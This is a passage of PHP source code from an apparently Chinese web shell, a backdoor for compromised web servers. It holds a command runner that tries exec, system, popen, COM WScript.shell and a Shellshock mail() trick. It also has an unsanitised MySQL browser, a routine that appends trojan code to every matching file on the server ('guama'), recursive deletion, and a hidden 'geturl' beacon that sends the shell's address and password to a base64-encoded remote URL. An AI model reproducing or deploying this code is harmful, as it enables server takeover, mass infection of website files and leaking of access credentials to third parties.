\'&table=\'.$_GET[\'table\'];if(isset($_GET[\'edit\'])) $action .= \'&edit=\'.$_GET[\'edit\'];}\r\n\t\t\tif(isset($_GET[\'insert\'])) $action .= \'&insert=\'.$_GET[\'insert\'];\r\n\t\t\techo \'
\';\r\n\t\t\techo \' \';\r\n\t\t\techo \' \';\r\n\t\t\techo \' \';\r\n\t\t\techo \' \';\r\n\t\t\techo \'
\';\r\n\t\t\techo \'
\'.$MSG_BOX.\'
\'.$_GET[\'db\'].\' ---> \';\r\n\t\t\tif(isset($_GET[\'table\']))\r\n\t\t\t{\r\n\t\t\t\techo \'\'.$_GET[\'table\'].\' \';\r\n\t\t\t\techo \'[]
\';\r\n\t\t\t\tif(isset($_GET[\'edit\']))\r\n\t\t\t\t{\r\n\t\t\t\t\tif(isset($_GET[\'p\'])) $atable = $_GET[\'table\'].\'&p=\'.$_GET[\'p\']; else $atable = $_GET[\'table\'];\r\n\t\t\t\t\techo \'
\';\r\n\t\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$_GET[\'edit\'].\', 1;\',$conn);\r\n\t\t\t\t\t$good = mysql_fetch_assoc($result);\r\n\t\t\t\t\t$u = 0;\r\n\t\t\t\t\tforeach($good as $var => $key)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$queryc .= $var.\'=\\\'\'.$key.\'\\\' AND \';\r\n\t\t\t\t\t\t$type = @mysql_field_type($result, $u);\r\n\t\t\t\t\t\t$len = @mysql_field_len($result, $u);\r\n\t\t\t\t\t\techo \'
\'.$var.\' \'.$type.\'(\'.$len.\')
\';\r\n\t\t\t\t\t\t$u++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$where = \'WHERE \'.substr($queryc, 0, -4);\r\n\t\t\t\t\techo \'\';\r\n\t\t\t\t\techo \'
\';\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$query = \'SHOW COLUMNS FROM \'.$_GET[\'table\'];\r\n\t\t $result = mysql_query($query,$conn);\r\n\t\t $fields = array();\r\n\t\t\t $pagesize=20;\r\n\t\t $row_num = mysql_num_rows(mysql_query(\'SELECT * FROM \'.$_GET[\'table\'],$conn));\r\n\t\t\t $numrows=$row_num;\r\n $pages=intval($numrows/$pagesize);\r\n if ($numrows%$pagesize) $pages++;\r\n $offset=$pagesize*($page - 1);\r\n $page=$_GET[\'p\'];\r\n if(!$page) $page=1;\r\n\r\n\t\t if(!isset($_GET[\'p\'])){$p = 0;$_GET[\'p\'] = 1;} else $p = ((int)$_GET[\'p\']-1)*20;\r\n\t\t\t\t\techo \'\';\r\n\t\t\t\t\techo \'\';\r\n\t\t\t\t\twhile($row = @mysql_fetch_assoc($result))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tarray_push($fields,$row[\'Field\']);\r\n\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo \'\';\r\n\t\t\t\t\tif(eregi(\'WHERE|LIMIT\',$_POST[\'nsql\']) && eregi(\'SELECT|FROM\',$_POST[\'nsql\'])) $query = $_POST[\'nsql\']; else $query = \'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$p.\', 20;\';\r\n\t\t\t\t\t$result = mysql_query($query,$conn);\r\n\t\t\t\t\t$v = $p;\r\n\t\t\t\t\twhile($text = @mysql_fetch_assoc($result))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\tforeach($fields as $row){echo \'\';}\r\n\t\t\t\t\t\techo \'\'."\\r\\n";$v++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo \'
\'.$row[\'Field\'].\'
޸ \';\r\n\t\t\t\t\t\techo \' ɾ \'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).\'
\';\r\n $pagep=$page-1;\r\n $pagen=$page+1;\r\n echo " ".$row_num." ¼ ";\r\n if($pagep>0) $pagenav.=" ҳ һҳ "; else $pagenav.=" һҳ ";\r\n if($pagen<=$pages) $pagenav.=" һҳ βҳ"; else $pagenav.=" һҳ ";\r\n $pagenav.=" [".$page."/".$pages."] ҳ ҳ";\r\n echo $pagenav;\r\n\t\t\t\t\techo \'
\';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telseif(isset($_GET[\'insert\']))\r\n\t\t\t{\r\n\t\t\t\techo \'\'.$_GET[\'insert\'].\'\';\r\n\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'insert\'],$conn);\r\n\t\t\t\t$fieldnum = @mysql_num_fields($result);\r\n\t\t\t\techo \'
\';\r\n\t\t\t\tfor($i = 0;$i < $fieldnum;$i++)\r\n\t\t\t\t{\r\n\t\t\t\t\t$name = @mysql_field_name($result, $i);\r\n\t\t\t\t\t$type = @mysql_field_type($result, $i);\r\n\t\t\t\t\t$len = @mysql_field_len($result, $i);\r\n\t\t\t\t\techo \'
\'.$name.\' \'.$type.\'(\'.$len.\')
\';\r\n\t\t\t\t}\r\n\t\t\t\techo \'
\';\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$query = \'SHOW TABLE STATUS\';\r\n\t\t\t\t$status = @mysql_query($query,$conn);\r\n\t\t\t\twhile($statu = @mysql_fetch_array($status))\r\n\t\t\t\t{\r\n\t\t\t\t\t$statusize[] = $statu[\'Data_length\'];\r\n\t\t\t\t\t$statucoll[] = $statu[\'Collation\'];\r\n\t\t\t\t}\r\n\t\t\t\t$query = \'SHOW TABLES FROM \'.$_GET[\'db\'].\';\';\r\n\t\t\t\techo \'\';\r\n\t\t\t\techo \'\';\r\n\t\t\t\techo \'\';\r\n\t\t\t\techo \'\';\r\n\t\t\t\techo \'\';\r\n\t\t\t\t$result = @mysql_query($query,$conn);\r\n\t\t\t\t$k = 0;\r\n\t\t\t\twhile($table = mysql_fetch_row($result))\r\n\t\t\t\t{\r\n\t\t\t\t\t$charset=substr($statucoll[$k],0,strpos($statucoll[$k],\'_\'));\r\n\t\t\t\t\techo \'\';\r\n\t\t\t\t\techo \'\';\r\n\t\t\t\t\techo \'\'."\\r\\n";\r\n\t\t\t\t\t$k++;\r\n\t\t\t\t}\r\n\t\t\t\techo \'
ַ С
\'.$table[0].\' ɾ \'.$statucoll[$k].\'\'.File_Size($statusize[$k]).\'
\';\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse die(\'MYSQLʧ,µ½.\');\r\n\tif(!$BOOL and addslashes($query)!=\'\') echo \'\';\r\nbreak;\r\n\r\n\t\r\n\tdefault: html_main($path,$shellname); break;\r\n}\r\ncss_foot();\r\n/*---doing---*/\r\n\r\nfunction do_write($file,$t,$text)\r\n{\r\n\t$key = true;\r\n\t$handle = @fopen($file,$t);\r\n\tif(!@fwrite($handle,$text))\r\n\t{\r\n\t\t@chmod($file,0666);\r\n\t\t$key = @fwrite($handle,$text) ? true : false;\r\n\t}\r\n\t@fclose($handle);\r\n\treturn $key;\r\n}\r\n\r\nfunction do_show($filepath){\r\n\t$show = array();\r\n\t$dir = dir($filepath);\r\n\twhile($file = $dir->read()){\r\n\t\tif($file == \'.\' or $file == \'..\') continue;\r\n\t\t$files = str_path($filepath.\'/\'.$file);\r\n\t\t$show[] = $files;\r\n\t}\r\n\t$dir->close();\r\n\treturn $show;\r\n}\r\n\r\nfunction do_deltree($deldir){\r\n\t$showfile = do_show($deldir);\r\n\tforeach($showfile as $del){\r\n\t\tif(is_dir($del)){ \r\n\t\t\tif(!do_deltree($del)) return false;\r\n\t\t}elseif(!is_dir($del)){\r\n\t\t\t@chmod($del,0777);\r\n\t\t\tif(!@unlink($del)) return false;\r\n\t\t}\r\n\t}\r\n\t@chmod($deldir,0777);\r\n\tif(!@rmdir($deldir)) return false;\r\n\treturn true;\r\n}\r\n\r\nfunction do_showsql($query,$conn){\r\n\t$result = @mysql_query($query,$conn);\r\n\thtml_n(\'

\');\r\n}\r\n\r\nfunction hmlogin($xiao=1){\r\n$serveru = $_SERVER [\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\'];\r\n$serverp = envlpass;\r\nif (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE[\'serveru\'] and $serverp==$_COOKIE[\'serverp\'])) {echo "";} else {setcookie(\'serveru\',$serveru);setcookie(\'serverp\',$serverp);if($xiao==1){echo "";}else{geturl();}}\r\n}\r\n\r\nfunction do_down($fd){\r\n\tif(!@file_exists($fd)) msg(\'ļ\');\r\n\t$fileinfo = pathinfo($fd);\r\n\theader(\'Content-type: application/x-\'.$fileinfo[\'extension\']);\r\n\theader(\'Content-Disposition: attachment; filename=\'.$fileinfo[\'basename\']);\r\n\theader(\'Content-Length: \'.filesize($fd));\r\n\t@readfile($fd);\r\n\texit;\r\n}\r\n\r\nfunction do_download($filecode,$file){\r\n\theader("Content-type: application/unknown");\r\n\theader(\'Accept-Ranges: bytes\');\r\n\theader("Content-length: ".strlen($filecode));\r\n\theader("Content-disposition: attachment; filename=".$file.";");\r\n\techo $filecode;\r\n\texit;\r\n}\r\n\r\nfunction TestUtf8($text)\r\n{if(strlen($text) < 3) return false;\r\n$lastch = 0;\r\n$begin = 0;\r\n$BOM = true;\r\n$BOMchs = array(0xEF, 0xBB, 0xBF);\r\n$good = 0;\r\n$bad = 0;\r\n$notAscii = 0;\r\nfor($i=0; $i < strlen($text); $i++)\r\n{$ch = ord($text[$i]);\r\nif($begin < 3)\r\n{ $BOM = ($BOMchs[$begin]==$ch);\r\n$begin += 1;\r\ncontinue; }\r\nif($begin==4 && $BOM) break;\r\nif($ch >= 0x80 ) $notAscii++;\r\nif( ($ch&0xC0) == 0x80 )\r\n{if( ($lastch&0xC0) == 0xC0 )\r\n{$good += 1;}\r\nelse if( ($lastch&0x80) == 0 )\r\n{$bad += 1; }}\r\nelse if( ($lastch&0xC0) == 0xC0 )\r\n{$bad += 1;}\r\n$lastch = $ch;}\r\nif($begin == 4 && $BOM)\r\n{return 2;}\r\nelse if($notAscii==0)\r\n{return 1;}\r\nelse if ($good >= $bad )\r\n{return 2;}\r\nelse\r\n{return 0;}}\r\n\r\nfunction File_Str($string)\r\n{\r\n\treturn str_replace(\'//\',\'/\',str_replace(\'\\\\\',\'/\',$string));\r\n}\r\n\r\nfunction File_Write($filename,$filecode,$filemode)\r\n{\r\n\t$key = true;\r\n\t$handle = @fopen($filename,$filemode);\r\n\tif(!@fwrite($handle,$filecode))\r\n\t{\r\n\t\t@chmod($filename,0666);\r\n\t\t$key = @fwrite($handle,$filecode) ? true : false;\r\n\t}\r\n\t@fclose($handle);\r\n\treturn $key;\r\n}\r\n\r\nfunction Exec_Run($cmd)\r\n{\r\n\t$res = \'\';\r\n\tif(function_exists(\'exec\')){@exec($cmd,$res);$res = join("\\n",$res);}\r\n\telseif(function_exists(\'shell_exec\')){$res = @shell_exec($cmd);}\r\n\telseif(function_exists(\'system\')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}\r\n\telseif(function_exists(\'passthru\')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}\r\n\telseif(@is_resource($f=@popen($cmd,\'r\'))){$res = \'\';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}\r\n\telseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists(\'COM\')){$w=new COM(\'WScript.shell\');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}\r\n\telseif(function_exists(\'proc_open\')){$length = strcspn($cmd," \\t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array(\'pipe\', \'w\'),2 => array(\'pipe\', \'w\')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, \'UTF-8\');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, \'UTF-8\');}fclose($io[1]);fclose($io[2]);proc_close($p);}\r\n\telseif(function_exists(\'mail\')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}\r\n\treturn $res;\r\n}\r\n\r\nif(isset($_GET[\'login\'])==\'geturl\'){\r\n @set_time_limit(10);\r\n\t$serveru = $_SERVER [\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\'];\r\n $serverp = envlpass;\r\n $copyurl = base64_decode("");\r\n $url=$copyurl.$serveru.\'&pass=\'.$serverp;\r\n $url=urldecode($url);\r\n GetHtml($url);\r\n}\r\n\r\nfunction File_Mode()\r\n{\r\n\t$RealPath = realpath(\'./\');\r\n\t$SelfPath = $_SERVER[\'PHP_SELF\'];\r\n\t$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,\'/\'));\r\n\treturn File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));\r\n}\r\n\r\nfunction File_Size($size)\r\n{ \r\n $kb = 1024; // Kilobyte\r\n $mb = 1024 * $kb; // Megabyte\r\n $gb = 1024 * $mb; // Gigabyte\r\n $tb = 1024 * $gb; // Terabyte\r\n if($size < $kb)\r\n {\r\n return $size." B";\r\n }\r\n else if($size < $mb)\r\n { \r\n return round($size/$kb,2)." K";\r\n }\r\n else if($size < $gb)\r\n { \r\n return round($size/$mb,2)." M";\r\n }\r\n else if($size < $tb)\r\n { \r\n return round($size/$gb,2)." G";\r\n }\r\n else\r\n { \r\n return round($size/$tb,2)." T";\r\n }\r\n }\r\n\r\nfunction File_Read($filename)\r\n{\r\n\t$handle = @fopen($filename,"rb");\r\n\t$filecode = @fread($handle,@filesize($filename));\r\n\t@fclose($handle);\r\n\treturn $filecode;\r\n}\r\n\r\nfunction do_phpfun($cmd,$fun) {\r\n\t$res = \'\';\r\n\tswitch($fun){\r\n\t\tcase "exec": @exec($cmd,$res); $res = join("\\n",$res); break;\r\n\t\tcase "shell_exec": $res = @shell_exec($cmd); break;\r\n\t\tcase "system": @ob_start();\t@system($cmd); $res = @ob_get_contents();\t@ob_end_clean();break;\r\n\t\tcase "passthru": @ob_start();\t@passthru($cmd); $res = @ob_get_contents();\t@ob_end_clean();break;\r\n\t\tcase "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))\t$res .= @fread($f,1024);} @pclose($f);break;\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\nfunction do_passreturn($dir,$code,$type,$bool,$filetype = \'\',$shell = my_shell){\r\n\t$show = do_show($dir);\r\n\tforeach($show as $files){\r\n\t\tif(is_dir($files) && $bool){\r\n\t\t\tdo_passreturn($files,$code,$type,$bool,$filetype,$shell);\r\n\t\t}else{\r\n\t\t\tif($files == $shell) continue;\r\n\t\t\tswitch($type){\r\n\t\t\t\tcase "guama":\r\n\t\t\t\tif(debug($files,$filetype)){\r\n\t\t\t\t\tdo_write($files,"ab","\\n".$code) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "qingma":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\t$newcode = str_replace($code,\'\',$filecode);\r\n\t\t\t\t\tdo_write($files,"wb",$newcode) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "tihuan":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\t$newcode = str_replace($code,$filetype,$filecode);\r\n\t\t\t\t\tdo_write($files,"wb",$newcode) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scanfile":\r\n\t\t\t\t$file = explode(\'/\',$files);\r\n\t\t\t\tif(stristr($file[count($file)-1],$code)){\r\n\t\t\t\t\thtml_a("?eanver=editr&p=$files",$files);\r\n\t\t\t\t\techo \'
\';\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scancode":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\thtml_a("?eanver=editr&p=$files",$files);\r\n\t\t\t\t\techo \'
\';\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scanphp":\r\n\t\t\t\t$fileinfo = pathinfo($files);\r\n\t\t\t\tif($fileinfo[\'extension\'] == $code){\r\n\t\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\t\tif(muma($filecode,$code)){\r\n\t\t\t\t\t\thtml_a("?eanver=editr&p=".urlencode($files),"༭");\r\n\t\t\t\t\t\thtml_a("?eanver=del&p=".urlencode($files),"ɾ");\r\n\t\t\t\t\t\techo $files.\'
\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\nclass PHPzip{\r\n\r\n\tvar $file_count = 0 ;\r\n\tvar $datastr_len = 0;\r\n\tvar $dirstr_len = 0;\r\n\tvar $filedata = \'\';\r\n\tvar $gzfilename;\r\n\tvar $fp;\r\n\tvar $dirstr=\'\';\r\n\r\n function unix2DosTime($unixtime = 0) {\r\n $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);\r\n\r\n if ($timearray[\'year\'] < 1980) {\r\n \t$timearray[\'year\'] = 1980;\r\n \t$timearray[\'mon\'] = 1;\r\n \t$timearray[\'mday\'] = 1;\r\n \t$timearray[\'hours\'] = 0;\r\n \t$timearray[\'minutes\'] = 0;\r\n \t$timearray[\'seconds\'] = 0;\r\n }\r\n\r\n return (($timearray[\'year\'] - 1980) << 25) | ($timearray[\'mon\'] << 21) | ($timearray[\'mday\'] << 16) |\r\n ($timearray[\'hours\'] << 11) | ($timearray[\'minutes\'] << 5) | ($timearray[\'seconds\'] >> 1);\r\n }\r\n\r\n\tfunction startfile($path = \'QQqun555227.zip\'){\r\n\t\t$this->gzfilename=$path;\r\n\t\t$mypathdir=array();\r\n\t\tdo{\r\n\t\t\t$mypathdir[] = $path = dirname($path);\r\n\t\t}while($path != \'.\');\r\n\t\t@end($mypathdir);\r\n\t\tdo{\r\n\t\t\t$path = @current($mypathdir);\r\n\t\t\t@mkdir($path);\r\n\t\t}while(@prev($mypathdir));\r\n\r\n\t\tif($this->fp=@fopen($this->gzfilename,"w")){\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\treturn false;\r\n\t}\r\n\r\n function addfile($data, $name){\r\n $name = str_replace(\'\\\\\', \'/\', $name);\r\n\t\t\r\n\t\tif(strrchr($name,\'/\')==\'/\') return $this->adddir($name);\r\n\t\t\r\n $dtime = dechex($this->unix2DosTime());\r\n $hexdtime = \'\\x\' . $dtime[6] . $dtime[7]\r\n . \'\\x\' . $dtime[4] . $dtime[5]\r\n . \'\\x\' . $dtime[2] . $dtime[3]\r\n . \'\\x\' . $dtime[0] . $dtime[1];\r\n eval(\'$hexdtime = "\' . $hexdtime . \'";\');\r\n\r\n $unc_len = strlen($data);\r\n $crc = crc32($data);\r\n $zdata = gzcompress($data);\r\n $c_len = strlen($zdata);\r\n $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);\r\n\t\t\r\n $datastr = "\\x50\\x4b\\x03\\x04";\r\n $datastr .= "\\x14\\x00"; \r\n $datastr .= "\\x00\\x00";\r\n $datastr .= "\\x08\\x00"; \r\n $datastr .= $hexdtime; \r\n $datastr .= pack(\'V\', $crc);\r\n $datastr .= pack(\'V\', $c_len);\r\n $datastr .= pack(\'V\', $unc_len);\r\n $datastr .= pack(\'v\', strlen($name));\r\n $datastr .= pack(\'v\', 0); \r\n $datastr .= $name;\r\n $datastr .= $zdata;\r\n $datastr .= pack(\'V\', $crc); \r\n $datastr .= pack(\'V\', $c_len);\r\n $datastr .= pack(\'V\', $unc_len);\r\n\r\n\r\n\t\tfwrite($this->fp,$datastr);\r\n\t\t$my_datastr_len = strlen($datastr);\r\n\t\tunset($datastr);\r\n\t\t\r\n $dirstr = "\\x50\\x4b\\x01\\x02";\r\n $dirstr .= "\\x00\\x00"; \r\n $dirstr .= "\\x14\\x00";\r\n $dirstr .= "\\x00\\x00";\r\n $dirstr .= "\\x08\\x00";\r\n $dirstr .= $hexdtime;\r\n $dirstr .= pack(\'V\', $crc); \r\n $dirstr .= pack(\'V\', $c_len); \r\n $dirstr .= pack(\'V\', $unc_len); \t// uncompressed filesize\r\n $dirstr .= pack(\'v\', strlen($name) ); \t// length of filename\r\n $dirstr .= pack(\'v\', 0 ); \t// extra field length\r\n $dirstr .= pack(\'v\', 0 ); \t// file comment length\r\n $dirstr .= pack(\'v\', 0 ); \t// disk number start\r\n $dirstr .= pack(\'v\', 0 ); \t// internal file attributes\r\n $dirstr .= pack(\'V\', 32 ); \t// external file attributes - \'archive\' bit set\r\n $dirstr .= pack(\'V\',$this->datastr_len ); // relative offset of local header\r\n $dirstr .= $name;\r\n\t\t\r\n\t\t$this->dirstr .= $dirstr;\t//Ŀ¼Ϣ\r\n\t\t\r\n\t\t$this -> file_count ++;\r\n\t\t$this -> dirstr_len += strlen($dirstr);\r\n\t\t$this -> datastr_len += $my_datastr_len;\t\r\n }\r\n\r\n\tfunction adddir($name){ \r\n\t\t$name = str_replace("\\\\", "/", $name); \r\n\t\t$datastr = "\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; \r\n\t\t\r\n\t\t$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); \r\n\t\t$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); \r\n\r\n\t\tfwrite($this->fp,$datastr);\t\r\n\t\t$my_datastr_len = strlen($datastr);\r\n\t\tunset($datastr);\r\n\t\t\r\n\t\t$dirstr = "\\x50\\x4b\\x01\\x02\\x00\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; \r\n\t\t$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); \r\n\t\t$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); \r\n\t\t$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name; \r\n\t\t\r\n\t\t$this->dirstr .= $dirstr;\r\n\r\n\t\t$this -> file_count ++;\r\n\t\t$this -> dirstr_len += strlen($dirstr);\r\n\t\t$this -> datastr_len += $my_datastr_len;\t\r\n\t}\r\n\r\n\r\n\tfunction createfile(){\r\n\t\t$endstr = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00" .\r\n\t\t\t\t\tpack(\'v\', $this -> file_count) .\r\n\t\t\t\t\tpack(\'v\', $this -> file_count) .\r\n\t\t\t\t\tpack(\'V\', $this -> dirstr_len) .\r\n\t\t\t\t\tpack(\'V\', $this -> datastr_len) .\r\n\t\t\t\t\t"\\x00\\x00";\r\n\r\n\t\tfwrite($this->fp,$this->dirstr.$endstr);\r\n\t\tfclose($this->fp);\r\n\t}\r\n }\r\n\r\n\r\nfunction start_unzip($tmp_name,$new_name,$todir=\'zipfile\'){\r\n$zip = new ZipArchive() ;\r\nif ($zip->open($tmp_name) !== TRUE) {\r\necho \'Ǹѹ޷򿪻\';\r\n}\r\n$zip->extractTo($todir);\r\n$zip->close();\r\necho \'ѹϣ   ѹĿ¼   \';\r\n}\r\n\r\nfunction muma($filecode,$filetype){\r\n\t$dim = array(\r\n\t"php" => array("eval(","exec("),\r\n\t"asp" => array("WScript.Shell","execute(","createtextfile("),\r\n\t"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),\r\n\t"jsp" => array("runtime.exec(")\r\n\t);\r\n\tforeach($dim[$filetype] as $code){\r\n\t\tif(stristr($filecode,$code)) return true;\r\n\t}\r\n}\r\n\r\nfunction debug($file,$ftype){\r\n\t$type=explode(\'|\',$ftype);\r\n\tforeach($type as $i){\r\n\t\tif(stristr($file,$i))\treturn true;\r\n\t}\r\n}\r\n\r\n/*---string---*/\r\n\r\nfunction str_path($path){\r\n\treturn str_replace(\'//\',\'/\',$path);\r\n}\r\n\r\nfunction msg($msg){\r\n\tdie("");\r\n}\r\n\r\nfunction uppath($nowpath){\r\n\t$nowpath = str_replace(\'\\\\\',\'/\',dirname($nowpath));\r\n\treturn urlencode($nowpath);\r\n}\r\n\r\nfunction xxstr($key){\r\n\t$temp = str_replace("\\\\\\\\","\\\\",$key);\r\n\t$temp = str_replace("\\\\","\\\\\\\\",$temp);\r\n\treturn $temp;\r\n}\r\n\r\n/*---html---*/\r\n\r\nfunction html_ta($url,$name){\r\n\thtml_n("$name");\r\n}\r\n\r\nfunction html_a($url,$name,$where=\'\'){\r\n\thtml_n("$name ");\r\n}\r\n\r\nfunction html_img($url){\r\n\thtml_n("");\r\n}\r\n\r\nfunction back(){\r\n\thtml_n("");\r\n}\r\n\r\nfunction html_radio($namei,$namet,$v1,$v2){\r\n\thtml_n(\'\'.$namei);\r\n\thtml_n(\'\'.$namet.\'

\');\r\n}\r\n\r\nfunction html_input($type,$name,$value = \'\',$text = \'\',$size = \'\',$mode = false){\r\n\tif($mode){\r\n\t\thtml_n("$text");\r\n\t}else{\r\n\t\thtml_n("$text ");\r\n\t}\r\n}\r\n\r\nfunction html_base(){\r\nhtml_n(\'function base64encode(str){\r\n\tvar base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";\r\n var out, i, len;\r\n var c1, c2, c3;\r\n len = str.length;\r\n i = 0;\r\n out = "";\r\n while (i < len) {\r\n c1 = str.charCodeAt(i++) & 0xff;\r\n if (i == len) {\r\n out += base64EncodeChars.charAt(c1 >> 2);\r\n out += base64EncodeChars.charAt((c1 & 0x3) << 4);\r\n out += "==";\r\n break;\r\n }\r\n c2 = str.charCodeAt(i++);\r\n if (i == len) {\r\n out += base64EncodeChars.charAt(c1 >> 2);\r\n out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));\r\n out += base64EncodeChars.charAt((c2 & 0xF) << 2);\r\n out += "=";\r\n break;\r\n }\r\n c3 = str.charCodeAt(i++);\r\n out += base64EncodeChars.charAt(c1 >> 2);\r\n out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));\r\n out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));\r\n out += base64EncodeChars.charAt(c3 & 0x3F);\r\n }\r\n return out;\r\n}\');\r\n}\r\n\r\nfunction html_text($name,$cols,$rows,$value = \'\'){\r\n\thtml_n("

");\r\n}\r\n\r\nfunction html_select($array,$mode = \'\',$change = \'\',$name = \'class\'){\r\n\thtml_n("");\r\n}\r\n\r\nfunction html_font($color,$size,$name){\r\n\thtml_n("$name");\r\n}\r\n\r\nfunction GetHtml($url)\r\n{\r\n $c = \'\';\r\n $useragent = \'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\';\r\n if(function_exists(\'fsockopen\')){\r\n \t$link = parse_url($url);\r\n\t $query=$link[\'path\'].\'?\'.$link[\'query\'];\r\n\t $host=strtolower($link[\'host\']);\r\n\t $port=$link[\'port\'];\r\n\t if($port==""){$port=80;}\r\n\t $fp = fsockopen ($host,$port, $errno, $errstr, 10);\r\n\t if ($fp)\r\n\t {\r\n\t\t $out = "GET /{$query} HTTP/1.0\\r\\n"; \r\n\t\t $out .= "Host: {$host}\\r\\n"; \r\n\t\t $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\\r\\n"; \r\n\t\t $out .= "Connection: Close\\r\\n\\r\\n"; \r\n\t\t fwrite($fp, $out);\r\n\t\t $inheader=1;\r\n\t\t while(!feof($fp)) \r\n\t\t {$line=fgets($fp,4096);\t\r\n\t\t\t if($inheader==0){$contents.=$line;}\r\n\t\t\t if ($inheader &&($line=="\\n"||$line=="\\r\\n")){$inheader = 0;}\r\n\t\t } \r\n\t\t fclose ($fp); \r\n\t\t $c= $contents;\r\n\t }\r\n }\r\n\t\tif(empty($c) && function_exists(\'curl_init\') && function_exists(\'curl_exec\')){\r\n $ch = curl_init();\r\n curl_setopt($ch, CURLOPT_URL, $url);\r\n curl_setopt($ch, CURLOPT_TIMEOUT, 15);\r\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);\r\n curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n $c = curl_exec($ch);\r\n curl_close($ch);\r\n }\r\n if(empty($c) && ini_get(\'allow_url_fopen\')){\r\n $c = file_get_contents($url);\r\n }\r\n\t\tif(empty($c)){\r\n echo "document.write(\'
